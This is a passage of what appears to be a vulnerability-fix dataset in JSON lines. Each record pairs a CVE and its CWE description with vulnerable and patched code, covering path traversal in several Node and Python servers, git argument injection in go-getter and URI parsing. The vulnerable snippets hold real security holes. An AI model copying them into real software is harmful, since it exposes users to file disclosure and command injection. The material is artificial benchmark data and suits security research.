(string.substring(0, 2) === '//') {\n // relative-scheme\n parts.protocol = null;\n string = string.substring(2);\n // extract \"user:pass@host:port\"\n string = URI.parseAuthority(string, parts);\n } else {\n pos = string.indexOf(':');\n if (pos > -1) {\n parts.protocol = string.substring(0, pos) || null;\n if (parts.protocol && !parts.protocol.match(URI.protocol_expression)) {\n // : may be within the path\n parts.protocol = undefined;\n } else if (string.substring(pos + 1, pos + 3).replace(/\\\\/g, '/') === '//') {\n string = string.substring(pos + 3);\n\n // extract \"user:pass@host:port\"\n string = URI.parseAuthority(string, parts);\n } else {\n string = string.substring(pos + 1);\n parts.urn = true;\n }\n }\n }\n\n // what's left must be the path\n parts.path = string;\n\n // and we're done\n return parts;\n };"}], "fix_func": [{"id": "fix_js_273_1", "commit": "a8166fe02f3af6dc1b2b888dcbb807155aad9509", "file_path": "src/URI.js", "start_line": 491, "end_line": 553, "snippet": " URI.parse = function(string, parts) {\n var pos;\n if (!parts) {\n parts = {\n preventInvalidHostname: URI.preventInvalidHostname\n };\n }\n\n string = string.replace(URI.leading_whitespace_expression, '')\n\n // [protocol\"://\"[username[\":\"password]\"@\"]hostname[\":\"port]\"/\"?][path][\"?\"querystring][\"#\"fragment]\n\n // extract fragment\n pos = string.indexOf('#');\n if (pos > -1) {\n // escaping?\n parts.fragment = string.substring(pos + 1) || null;\n string = string.substring(0, pos);\n }\n\n // extract query\n pos = string.indexOf('?');\n if (pos > -1) {\n // escaping?\n parts.query = string.substring(pos + 1) || null;\n string = string.substring(0, pos);\n }\n\n // slashes and backslashes have lost all meaning for the web protocols (https, http, wss, ws)\n string = string.replace(/^(https?|ftp|wss?)?:+[/\\\\]*/i, '$1://');\n\n // extract protocol\n if (string.substring(0, 2) === '//') {\n // relative-scheme\n parts.protocol = null;\n string = string.substring(2);\n // extract \"user:pass@host:port\"\n string = URI.parseAuthority(string, parts);\n } else {\n pos = string.indexOf(':');\n if (pos > -1) {\n parts.protocol = string.substring(0, pos) || null;\n if (parts.protocol && !parts.protocol.match(URI.protocol_expression)) {\n // : may be within the path\n parts.protocol = undefined;\n } else if (string.substring(pos + 1, pos + 3).replace(/\\\\/g, '/') === '//') {\n string = string.substring(pos + 3);\n\n // extract \"user:pass@host:port\"\n string = URI.parseAuthority(string, parts);\n } else {\n string = string.substring(pos + 1);\n parts.urn = true;\n }\n }\n }\n\n // what's left must be the path\n parts.path = string;\n\n // and we're done\n return parts;\n };"}], "vul_patch": "--- a/src/URI.js\n+++ b/src/URI.js\n@@ -27,7 +27,7 @@\n }\n \n // slashes and backslashes have lost all meaning for the web protocols (https, http, wss, ws)\n- string = string.replace(/^(https?|ftp|wss?)?:[/\\\\]*/i, '$1://');\n+ string = string.replace(/^(https?|ftp|wss?)?:+[/\\\\]*/i, '$1://');\n \n // extract protocol\n if (string.substring(0, 2) === '//') {\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2015-2298", "cve_description": "node/utils/ExportEtherpad.js in Etherpad 1.5.x before 1.5.2 might allow remote attackers to obtain sensitive information by leveraging an improper substring check when exporting a padID.", "cwe_info": {"CWE-200": {"name": "Exposure of Sensitive Information to an Unauthorized Actor", "description": "The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information."}}, "repo": "https://github.com/ether/etherpad-lite", "patch_url": ["https://github.com/ether/etherpad-lite/commit/a0fb65205c7d7ff95f00eb9fd88e93b300f30c3d"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_278_1", "commit": "ec7ff3a0cac87b9319c714f792f5d39d68716c6f", "file_path": "src/node/utils/ExportEtherpad.js", "start_line": 22, "end_line": 69, "snippet": "exports.getPadRaw = function(padId, callback){\n async.waterfall([\n function(cb){\n\n // Get the Pad available content keys\n db.findKeys(\"pad:\"+padId+\"*\", null, function(err,records){\n if(!err){\n cb(err, records);\n }\n })\n },\n function(records, cb){\n var data = {};\n\n async.forEachSeries(Object.keys(records), function(key, r){\n\n // For each piece of info about a pad.\n db.get(records[key], function(err, entry){\n data[records[key]] = entry;\n\n // Get the Pad Authors\n if(entry.pool && entry.pool.numToAttrib){\n var authors = entry.pool.numToAttrib;\n async.forEachSeries(Object.keys(authors), function(k, c){\n if(authors[k][0] === \"author\"){\n var authorId = authors[k][1];\n\n // Get the author info\n db.get(\"globalAuthor:\"+authorId, function(e, authorEntry){\n if(authorEntry && authorEntry.padIDs) authorEntry.padIDs = padId;\n if(!e) data[\"globalAuthor:\"+authorId] = authorEntry;\n });\n\n }\n // console.log(\"authorsK\", authors[k]);\n c(null);\n });\n }\n r(null); // callback;\n });\n }, function(err){ \n cb(err, data);\n })\n }\n ], function(err, data){\n callback(null, data);\n });\n}"}], "fix_func": [{"id": "fix_js_278_1", "commit": "a0fb65205c7d7ff95f00eb9fd88e93b300f30c3d", "file_path": "src/node/utils/ExportEtherpad.js", "start_line": 22, "end_line": 79, "snippet": "exports.getPadRaw = function(padId, callback){\n async.waterfall([\n function(cb){\n\n // Get the Pad\n db.findKeys(\"pad:\"+padId, null, function(err,padcontent){\n if(!err){\n cb(err, padcontent);\n }\n })\n },\n function(padcontent,cb){\n\n // Get the Pad available content keys\n db.findKeys(\"pad:\"+padId+\":*\", null, function(err,records){\n if(!err){\n for (var key in padcontent) { records.push(padcontent[key]);}\n cb(err, records);\n }\n })\n },\n function(records, cb){\n var data = {};\n\n async.forEachSeries(Object.keys(records), function(key, r){\n\n // For each piece of info about a pad.\n db.get(records[key], function(err, entry){\n data[records[key]] = entry;\n\n // Get the Pad Authors\n if(entry.pool && entry.pool.numToAttrib){\n var authors = entry.pool.numToAttrib;\n async.forEachSeries(Object.keys(authors), function(k, c){\n if(authors[k][0] === \"author\"){\n var authorId = authors[k][1];\n\n // Get the author info\n db.get(\"globalAuthor:\"+authorId, function(e, authorEntry){\n if(authorEntry && authorEntry.padIDs) authorEntry.padIDs = padId;\n if(!e) data[\"globalAuthor:\"+authorId] = authorEntry;\n });\n\n }\n // console.log(\"authorsK\", authors[k]);\n c(null);\n });\n }\n r(null); // callback;\n });\n }, function(err){ \n cb(err, data);\n })\n }\n ], function(err, data){\n callback(null, data);\n });\n}"}], "vul_patch": "--- a/src/node/utils/ExportEtherpad.js\n+++ b/src/node/utils/ExportEtherpad.js\n@@ -2,9 +2,19 @@\n async.waterfall([\n function(cb){\n \n+ // Get the Pad\n+ db.findKeys(\"pad:\"+padId, null, function(err,padcontent){\n+ if(!err){\n+ cb(err, padcontent);\n+ }\n+ })\n+ },\n+ function(padcontent,cb){\n+\n // Get the Pad available content keys\n- db.findKeys(\"pad:\"+padId+\"*\", null, function(err,records){\n+ db.findKeys(\"pad:\"+padId+\":*\", null, function(err,records){\n if(!err){\n+ for (var key in padcontent) { records.push(padcontent[key]);}\n cb(err, records);\n }\n })\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2023-49801", "cve_description": "Lif Auth Server is a server for validating logins, managing information, and account recovery for Lif Accounts. The issue relates to the `get_pfp` and `get_banner` routes on Auth Server. The issue is that there is no check to ensure that the file that Auth Server is receiving through these URLs is correct. This could allow an attacker access to files they shouldn't have access to. This issue has been patched in version 1.4.0.", "cwe_info": {"CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/Lif-Platforms/Lif-Auth-Server", "patch_url": ["https://github.com/Lif-Platforms/Lif-Auth-Server/commit/c235bcc2ee65e4a0dfb10284cf2cbc750213efeb"], "programing_language": "Python", "vul_func": [{"id": "vul_py_382_1", "commit": "ffb704bf417213afc59cab9d74e5da0a5ead2a93", "file_path": "src/auth_server.py", "start_line": 335, "end_line": 351, "snippet": "async def get_pfp(username: str):\n \"\"\"\n ## Get User Avatar (Profile Picture)\n Allows services to get the avatar (profile picture) of a specified account. \n \n ### Parameters:\n - **username (str):** The username for the account.\n\n ### Returns:\n - **file:** The avatar the service requested.\n \"\"\"\n # Checks if the user has a profile pic uploaded\n if os.path.isfile(f\"user_images/pfp/{username}\"):\n return FileResponse(f\"user_images/pfp/{username}\", media_type='image/gif')\n else:\n # Returns default image if none is uploaded\n return FileResponse(f'{assets_folder}/default_pfp.png', media_type='image/gif')"}, {"id": "vul_py_382_2", "commit": "ffb704bf417213afc59cab9d74e5da0a5ead2a93", "file_path": "src/auth_server.py", "start_line": 354, "end_line": 370, "snippet": "async def get_banner(username: str):\n \"\"\"\n ## Get User Banner\n Allows services to get the account banner of a specified account.\n \n ### Parameters:\n - **username (str):** The username for the account.\n\n ### Returns:\n - **file:** The banner the service requested.\n \"\"\"\n # Checks if the user has a profile pic uploaded\n if os.path.isfile(f\"user_images/banner/{username}\"):\n return FileResponse(f\"user_images/banner/{username}\", media_type='image/gif')\n else:\n # Returns default image if none is uploaded\n return FileResponse(f'{assets_folder}/default_banner.png', media_type='image/gif')"}], "fix_func": [{"id": "fix_py_382_1", "commit": "c235bcc2ee65e4a0dfb10284cf2cbc750213efeb", "file_path": "src/auth_server.py", "start_line": 335, "end_line": 359, "snippet": "async def get_pfp(username: str):\n \"\"\"\n ## Get User Avatar (Profile Picture)\n Allows services to get the avatar (profile picture) of a specified account. \n \n ### Parameters:\n - **username (str):** The username for the account.\n\n ### Returns:\n - **file:** The avatar the service requested.\n \"\"\"\n # Sanitize and validate the username variable (Example: alphanumeric characters allowed)\n if not username.isalnum():\n # Handle invalid input (username contains non-alphanumeric characters)\n return FileResponse(f'{assets_folder}/default_pfp.png', media_type='image/gif')\n\n # Construct the file path using the sanitized username\n banner_path = f\"user_images/pfp/{username}\"\n\n # Check if the file exists and is a regular file\n if os.path.isfile(banner_path):\n return FileResponse(banner_path, media_type='image/gif')\n else:\n # Return default image if the user's banner doesn't exist\n return FileResponse(f'{assets_folder}/default_pfp.png', media_type='image/gif')"}, {"id": "fix_py_382_2", "commit": "c235bcc2ee65e4a0dfb10284cf2cbc750213efeb", "file_path": "src/auth_server.py", "start_line": 362, "end_line": 386, "snippet": "async def get_banner(username: str):\n \"\"\"\n ## Get User Banner\n Allows services to get the account banner of a specified account.\n \n ### Parameters:\n - **username (str):** The username for the account.\n\n ### Returns:\n - **file:** The banner the service requested.\n \"\"\"\n # Sanitize and validate the username variable (Example: alphanumeric characters allowed)\n if not username.isalnum():\n # Handle invalid input (username contains non-alphanumeric characters)\n return FileResponse(f'{assets_folder}/default_banner.png', media_type='image/gif')\n\n # Construct the file path using the sanitized username\n banner_path = f\"user_images/banner/{username}\"\n\n # Check if the file exists and is a regular file\n if os.path.isfile(banner_path):\n return FileResponse(banner_path, media_type='image/gif')\n else:\n # Return default image if the user's banner doesn't exist\n return FileResponse(f'{assets_folder}/default_banner.png', media_type='image/gif')"}], "vul_patch": "--- a/src/auth_server.py\n+++ b/src/auth_server.py\n@@ -9,9 +9,17 @@\n ### Returns:\n - **file:** The avatar the service requested.\n \"\"\"\n- # Checks if the user has a profile pic uploaded\n- if os.path.isfile(f\"user_images/pfp/{username}\"):\n- return FileResponse(f\"user_images/pfp/{username}\", media_type='image/gif')\n+ # Sanitize and validate the username variable (Example: alphanumeric characters allowed)\n+ if not username.isalnum():\n+ # Handle invalid input (username contains non-alphanumeric characters)\n+ return FileResponse(f'{assets_folder}/default_pfp.png', media_type='image/gif')\n+\n+ # Construct the file path using the sanitized username\n+ banner_path = f\"user_images/pfp/{username}\"\n+\n+ # Check if the file exists and is a regular file\n+ if os.path.isfile(banner_path):\n+ return FileResponse(banner_path, media_type='image/gif')\n else:\n- # Returns default image if none is uploaded\n+ # Return default image if the user's banner doesn't exist\n return FileResponse(f'{assets_folder}/default_pfp.png', media_type='image/gif')\n\n--- a/src/auth_server.py\n+++ b/src/auth_server.py\n@@ -9,9 +9,17 @@\n ### Returns:\n - **file:** The banner the service requested.\n \"\"\"\n- # Checks if the user has a profile pic uploaded\n- if os.path.isfile(f\"user_images/banner/{username}\"):\n- return FileResponse(f\"user_images/banner/{username}\", media_type='image/gif')\n+ # Sanitize and validate the username variable (Example: alphanumeric characters allowed)\n+ if not username.isalnum():\n+ # Handle invalid input (username contains non-alphanumeric characters)\n+ return FileResponse(f'{assets_folder}/default_banner.png', media_type='image/gif')\n+\n+ # Construct the file path using the sanitized username\n+ banner_path = f\"user_images/banner/{username}\"\n+\n+ # Check if the file exists and is a regular file\n+ if os.path.isfile(banner_path):\n+ return FileResponse(banner_path, media_type='image/gif')\n else:\n- # Returns default image if none is uploaded\n+ # Return default image if the user's banner doesn't exist\n return FileResponse(f'{assets_folder}/default_banner.png', media_type='image/gif')\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2018-3729", "cve_description": "localhost-now node module suffers from a Path Traversal vulnerability due to lack of validation of file, which allows a malicious user to read content of any file with known path.", "cwe_info": {"CWE-73": {"name": "External Control of File Name or Path", "description": "The product allows user input to control or influence paths or file names that are used in filesystem operations."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/DCKT/localhost-now", "patch_url": ["https://github.com/DCKT/localhost-now/commit/30b004c7f145d677df8800a106c2edc982313995#diff-b9cfc7f2cdf78a7f4b91a753d10865a2"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_182_1", "commit": "f12b069", "file_path": "lib/app.js", "start_line": 6, "end_line": 43, "snippet": "exports.start = function(args) {\n\tvar port = parseInt(args[0]) ? args[0] : 1337;\n\n\thttp.createServer(function(req, res) {\n\t\tvar url = req.url;\n\n\t\tif (url.indexOf('?') != -1) {\n\t\t\turl = url.split('?')[0];\n\t\t}\n\n\t\tvar file = url === \"/\" ? \"/index.html\" : url;\n\n\t\tfs.readFile(path.normalize(process.cwd()) + file, function(err, data) {\n\t\t\tif (!!err) {\n\t\t\t\tconsole.error('Error loading : '+ url);\n\t\t\t\tres.writeHead(404);\n\t\t\t\tres.end();\n\t\t\t}\n\t\t\telse {\n\t\t\t\tvar type = path.extname(file);\n\n\t\t\t\tif (type === \".js\") {\n\t contentType = 'application/javascript';\n\t\t\t\t}\n\t\t\t\telse {\n\t\t\t\t\tcontentType = \"text/\"+ type.slice(1, type.length);\n\t\t\t\t}\n\n\t\t\t\tres.setHeader('content-type', contentType);\n\t\t\t\tres.end(data);\n\t\t\t}\n\n\n\t\t});\n\n\t}).listen(port);\n\tprocess.stdout.write(\"\\033[33mWeb Server started on localhost:\"+ port +\" \\033[39m\\n\");\n}"}], "fix_func": [{"id": "fix_js_182_1", "commit": "30b004c", "file_path": "lib/app.js", "start_line": 6, "end_line": 41, "snippet": "exports.start = function(args) {\n const port = parseInt(args[0]) ? args[0] : 1337\n\n http\n .createServer(function(req, res) {\n const url = req.url\n\n if (url.indexOf('?') != -1) {\n url = url.split('?')[0]\n }\n\n const file = url === '/' ? '/index.html' : url.replace(/(\\.\\.[\\/\\\\])+/g, '')\n const rootPath = path.normalize(process.cwd())\n\n fs.readFile(`${rootPath}${file}`, (err, data) => {\n if (!!err) {\n console.error('Error loading : ' + url)\n res.writeHead(404)\n res.end()\n } else {\n var type = path.extname(file)\n\n if (type === '.js') {\n contentType = 'application/javascript'\n } else {\n contentType = 'text/' + type.slice(1, type.length)\n }\n\n res.setHeader('content-type', contentType)\n res.end(data)\n }\n })\n })\n .listen(port)\n process.stdout.write('\\033[33mWeb Server started on localhost:' + port + ' \\033[39m\\n')\n}"}], "vul_patch": "--- a/lib/app.js\n+++ b/lib/app.js\n@@ -1,38 +1,36 @@\n exports.start = function(args) {\n-\tvar port = parseInt(args[0]) ? args[0] : 1337;\n+ const port = parseInt(args[0]) ? args[0] : 1337\n \n-\thttp.createServer(function(req, res) {\n-\t\tvar url = req.url;\n+ http\n+ .createServer(function(req, res) {\n+ const url = req.url\n \n-\t\tif (url.indexOf('?') != -1) {\n-\t\t\turl = url.split('?')[0];\n-\t\t}\n+ if (url.indexOf('?') != -1) {\n+ url = url.split('?')[0]\n+ }\n \n-\t\tvar file = url === \"/\" ? \"/index.html\" : url;\n+ const file = url === '/' ? '/index.html' : url.replace(/(\\.\\.[\\/\\\\])+/g, '')\n+ const rootPath = path.normalize(process.cwd())\n \n-\t\tfs.readFile(path.normalize(process.cwd()) + file, function(err, data) {\n-\t\t\tif (!!err) {\n-\t\t\t\tconsole.error('Error loading : '+ url);\n-\t\t\t\tres.writeHead(404);\n-\t\t\t\tres.end();\n-\t\t\t}\n-\t\t\telse {\n-\t\t\t\tvar type = path.extname(file);\n+ fs.readFile(`${rootPath}${file}`, (err, data) => {\n+ if (!!err) {\n+ console.error('Error loading : ' + url)\n+ res.writeHead(404)\n+ res.end()\n+ } else {\n+ var type = path.extname(file)\n \n-\t\t\t\tif (type === \".js\") {\n-\t contentType = 'application/javascript';\n-\t\t\t\t}\n-\t\t\t\telse {\n-\t\t\t\t\tcontentType = \"text/\"+ type.slice(1, type.length);\n-\t\t\t\t}\n+ if (type === '.js') {\n+ contentType = 'application/javascript'\n+ } else {\n+ contentType = 'text/' + type.slice(1, type.length)\n+ }\n \n-\t\t\t\tres.setHeader('content-type', contentType);\n-\t\t\t\tres.end(data);\n-\t\t\t}\n-\n-\n-\t\t});\n-\n-\t}).listen(port);\n-\tprocess.stdout.write(\"\\033[33mWeb Server started on localhost:\"+ port +\" \\033[39m\\n\");\n+ res.setHeader('content-type', contentType)\n+ res.end(data)\n+ }\n+ })\n+ })\n+ .listen(port)\n+ process.stdout.write('\\033[33mWeb Server started on localhost:' + port + ' \\033[39m\\n')\n }\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-6257", "cve_description": "HashiCorp\u2019s go-getter library can be coerced into executing Git update on an existing maliciously modified Git Configuration, potentially leading to arbitrary code execution.", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}, "CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}, "CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/hashicorp/go-getter", "patch_url": ["https://github.com/hashicorp/go-getter/commit/268c11cae8cf0d9374783e06572679796abe9ce9"], "programing_language": "Go", "vul_func": [{"id": "vul_go_20_1", "commit": "975961f", "file_path": "get_git.go", "start_line": 192, "end_line": 229, "snippet": "func (g *GitGetter) clone(ctx context.Context, dst, sshKeyFile string, u *url.URL, ref string, depth int) error {\n\targs := []string{\"clone\"}\n\n\toriginalRef := ref // we handle an unspecified ref differently than explicitly selecting the default branch below\n\tif ref == \"\" {\n\t\tref = findRemoteDefaultBranch(ctx, u)\n\t}\n\tif depth > 0 {\n\t\targs = append(args, \"--depth\", strconv.Itoa(depth))\n\t\targs = append(args, \"--branch\", ref)\n\t}\n\targs = append(args, u.String(), dst)\n\n\tcmd := exec.CommandContext(ctx, \"git\", args...)\n\tsetupGitEnv(cmd, sshKeyFile)\n\terr := getRunCommand(cmd)\n\tif err != nil {\n\t\tif depth > 0 && originalRef != \"\" {\n\t\t\t// If we're creating a shallow clone then the given ref must be\n\t\t\t// a named ref (branch or tag) rather than a commit directly.\n\t\t\t// We can't accurately recognize the resulting error here without\n\t\t\t// hard-coding assumptions about git's human-readable output, but\n\t\t\t// we can at least try a heuristic.\n\t\t\tif gitCommitIDRegex.MatchString(originalRef) {\n\t\t\t\treturn fmt.Errorf(\"%w (note that setting 'depth' requires 'ref' to be a branch or tag name)\", err)\n\t\t\t}\n\t\t}\n\t\treturn err\n\t}\n\n\tif depth < 1 && originalRef != \"\" {\n\t\t// If we didn't add --depth and --branch above then we will now be\n\t\t// on the remote repository's default branch, rather than the selected\n\t\t// ref, so we'll need to fix that before we return.\n\t\treturn g.checkout(ctx, dst, originalRef)\n\t}\n\treturn nil\n}"}, {"id": "vul_go_20_2", "commit": "975961f", "file_path": "get_git.go", "start_line": 290, "end_line": 300, "snippet": "func findRemoteDefaultBranch(ctx context.Context, u *url.URL) string {\n\tvar stdoutbuf bytes.Buffer\n\tcmd := exec.CommandContext(ctx, \"git\", \"ls-remote\", \"--symref\", u.String(), \"HEAD\")\n\tcmd.Stdout = &stdoutbuf\n\terr := cmd.Run()\n\tmatches := lsRemoteSymRefRegexp.FindStringSubmatch(stdoutbuf.String())\n\tif err != nil || matches == nil {\n\t\treturn \"master\"\n\t}\n\treturn matches[len(matches)-1]\n}"}], "fix_func": [{"id": "fix_go_20_1", "commit": "268c11c", "file_path": "get_git.go", "start_line": 192, "end_line": 229, "snippet": "func (g *GitGetter) clone(ctx context.Context, dst, sshKeyFile string, u *url.URL, ref string, depth int) error {\n\targs := []string{\"clone\"}\n\n\toriginalRef := ref // we handle an unspecified ref differently than explicitly selecting the default branch below\n\tif ref == \"\" {\n\t\tref = findRemoteDefaultBranch(ctx, u)\n\t}\n\tif depth > 0 {\n\t\targs = append(args, \"--depth\", strconv.Itoa(depth))\n\t\targs = append(args, \"--branch\", ref)\n\t}\n\targs = append(args, \"--\", u.String(), dst)\n\n\tcmd := exec.CommandContext(ctx, \"git\", args...)\n\tsetupGitEnv(cmd, sshKeyFile)\n\terr := getRunCommand(cmd)\n\tif err != nil {\n\t\tif depth > 0 && originalRef != \"\" {\n\t\t\t// If we're creating a shallow clone then the given ref must be\n\t\t\t// a named ref (branch or tag) rather than a commit directly.\n\t\t\t// We can't accurately recognize the resulting error here without\n\t\t\t// hard-coding assumptions about git's human-readable output, but\n\t\t\t// we can at least try a heuristic.\n\t\t\tif gitCommitIDRegex.MatchString(originalRef) {\n\t\t\t\treturn fmt.Errorf(\"%w (note that setting 'depth' requires 'ref' to be a branch or tag name)\", err)\n\t\t\t}\n\t\t}\n\t\treturn err\n\t}\n\n\tif depth < 1 && originalRef != \"\" {\n\t\t// If we didn't add --depth and --branch above then we will now be\n\t\t// on the remote repository's default branch, rather than the selected\n\t\t// ref, so we'll need to fix that before we return.\n\t\treturn g.checkout(ctx, dst, originalRef)\n\t}\n\treturn nil\n}"}, {"id": "fix_go_20_2", "commit": "268c11c", "file_path": "get_git.go", "start_line": 290, "end_line": 300, "snippet": "func findRemoteDefaultBranch(ctx context.Context, u *url.URL) string {\n\tvar stdoutbuf bytes.Buffer\n\tcmd := exec.CommandContext(ctx, \"git\", \"ls-remote\", \"--symref\", \"--\", u.String(), \"HEAD\")\n\tcmd.Stdout = &stdoutbuf\n\terr := cmd.Run()\n\tmatches := lsRemoteSymRefRegexp.FindStringSubmatch(stdoutbuf.String())\n\tif err != nil || matches == nil {\n\t\treturn \"master\"\n\t}\n\treturn matches[len(matches)-1]\n}"}], "vul_patch": "--- a/get_git.go\n+++ b/get_git.go\n@@ -9,7 +9,7 @@\n \t\targs = append(args, \"--depth\", strconv.Itoa(depth))\n \t\targs = append(args, \"--branch\", ref)\n \t}\n-\targs = append(args, u.String(), dst)\n+\targs = append(args, \"--\", u.String(), dst)\n \n \tcmd := exec.CommandContext(ctx, \"git\", args...)\n \tsetupGitEnv(cmd, sshKeyFile)\n\n--- a/get_git.go\n+++ b/get_git.go\n@@ -1,6 +1,6 @@\n func findRemoteDefaultBranch(ctx context.Context, u *url.URL) string {\n \tvar stdoutbuf bytes.Buffer\n-\tcmd := exec.CommandContext(ctx, \"git\", \"ls-remote\", \"--symref\", u.String(), \"HEAD\")\n+\tcmd := exec.CommandContext(ctx, \"git\", \"ls-remote\", \"--symref\", \"--\", u.String(), \"HEAD\")\n \tcmd.Stdout = &stdoutbuf\n \terr := cmd.Run()\n \tmatches := lsRemoteSymRefRegexp.FindStringSubmatch(stdoutbuf.String())\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2024-6257:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/go-getter\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\ngo test -timeout 30s -run ^TestGitGetter_BadRemoteUrl$ github.com/hashicorp/go-getter\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2024-6257:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/go-getter\ngit apply --whitespace=nowarn /workspace/fix.patch\ngo test -timeout 30s -run '^(TestGitGetter_gitVersion|TestGitGetter_tag|TestGitGetter_sshSCPStyleInvalidScheme|TestGitGetter_shallowClone|TestGitGetter_setupGitEnvWithNoKeyFile|TestGitGetter_commitID|TestGitGetter_branch|TestGitGetter_shallowCloneWithTag|TestGitGetter_GetFile|TestGitGetter_submodule|TestGitGetter_subdirectory|TestGitGetter_shallowCloneWithCommitID|TestGitGetter_setupGitEnv_sshKey|TestGitGetter_impl|TestGitGetter|TestGitGetter_branchUpdate|TestGitGetter_subdirectory_symlink|TestGitGetter_remoteWithoutMaster|TestGitGetter_setupGitEnvWithExisting_sshKey)$' github.com/hashicorp/go-getter"} {"cve_id": "CVE-2019-8903", "cve_description": "index.js in Total.js Platform before 3.2.3 allows path traversal.", "cwe_info": {"CWE-73": {"name": "External Control of File Name or Path", "description": "The product allows user input to control or influence paths or file names that are used in filesystem operations."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/totaljs/framework", "patch_url": ["https://github.com/totaljs/framework/commit/de16238d13848149f5d1dae51f54e397a525932b", "https://github.com/totaljs/framework/commit/c37cafbf3e379a98db71c1125533d1e8d5b5aef7"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_170_1", "commit": "f1e94c1", "file_path": "index.js", "start_line": 7380, "end_line": 7564, "snippet": "F.$requestcontinue = function(req, res, headers) {\n\n\tif (!req || !res || res.headersSent || res.success)\n\t\treturn;\n\n\t// Validates if this request is the file (static file)\n\tif (req.isStaticFile) {\n\n\t\t// Stops path travelsation outside of \"public\" directory\n\t\t// A potential security issue\n\t\tif (req.uri.pathname.indexOf('./') !== -1) {\n\t\t\treq.$total_status(404);\n\t\t\treturn;\n\t\t}\n\n\t\tF.stats.request.file++;\n\t\tif (F._length_files)\n\t\t\treq.$total_file();\n\t\telse\n\t\t\tres.continue();\n\t\treturn;\n\t}\n\n\tif (!PERF[req.method]) {\n\t\treq.$total_status(404);\n\t\treturn;\n\t}\n\n\tF.stats.request.web++;\n\n\treq.body = EMPTYOBJECT;\n\treq.files = EMPTYARRAY;\n\treq.buffer_exceeded = false;\n\treq.buffer_has = false;\n\treq.$flags = req.method[0] + req.method[1];\n\n\tvar flags = [req.method.toLowerCase()];\n\tvar multipart;\n\n\tif (F._request_check_mobile && req.mobile) {\n\t\treq.$flags += 'a';\n\t\tF.stats.request.mobile++;\n\t} else\n\t\tF.stats.request.desktop++;\n\n\treq.$protocol[5] && (req.$flags += req.$protocol[5]);\n\treq.$type = 0;\n\tflags.push(req.$protocol);\n\n\tvar method = req.method;\n\tvar first = method[0];\n\n\tif (first === 'P' || first === 'D') {\n\t\tmultipart = req.headers['content-type'] || '';\n\t\treq.buffer_data = U.createBuffer();\n\t\tvar index = multipart.lastIndexOf(';');\n\t\tvar tmp = multipart;\n\t\tif (index !== -1)\n\t\t\ttmp = tmp.substring(0, index);\n\t\tswitch (tmp.substring(tmp.length - 4)) {\n\t\t\tcase 'json':\n\t\t\t\treq.$flags += 'b';\n\t\t\t\tflags.push('json');\n\t\t\t\treq.$type = 1;\n\t\t\t\tmultipart = '';\n\t\t\t\tbreak;\n\t\t\tcase 'oded':\n\t\t\t\treq.$type = 3;\n\t\t\t\tmultipart = '';\n\t\t\t\tbreak;\n\t\t\tcase 'data':\n\t\t\t\treq.$flags += 'c';\n\t\t\t\treq.$upload = true;\n\t\t\t\tflags.push('upload');\n\t\t\t\tbreak;\n\t\t\tcase '/xml':\n\t\t\t\treq.$flags += 'd';\n\t\t\t\tflags.push('xml');\n\t\t\t\treq.$type = 2;\n\t\t\t\tmultipart = '';\n\t\t\t\tbreak;\n\t\t\tdefault:\n\t\t\t\tif (multipart) {\n\t\t\t\t\t// 'undefined' DATA\n\t\t\t\t\tmultipart = '';\n\t\t\t\t\tflags.push('raw');\n\t\t\t\t} else {\n\t\t\t\t\treq.$type = 3;\n\t\t\t\t\tmultipart = '';\n\t\t\t\t}\n\t\t\t\tbreak;\n\t\t}\n\t}\n\n\tif (headers.accept === 'text/event-stream') {\n\t\treq.$flags += 'g';\n\t\tflags.push('sse');\n\t}\n\n\tif (DEBUG) {\n\t\treq.$flags += 'h';\n\t\tflags.push('debug');\n\t}\n\n\tif (req.xhr) {\n\t\tF.stats.request.xhr++;\n\t\treq.$flags += 'i';\n\t\tflags.push('xhr');\n\t}\n\n\tif (F._request_check_robot && req.robot)\n\t\treq.$flags += 'j';\n\n\tif (F._request_check_referer) {\n\t\tvar referer = headers['referer'];\n\t\tif (referer && referer.indexOf(headers['host']) !== -1) {\n\t\t\treq.$flags += 'k';\n\t\t\tflags.push('referer');\n\t\t}\n\t}\n\n\treq.flags = flags;\n\tF.$events['request-begin'] && EMIT('request-begin', req, 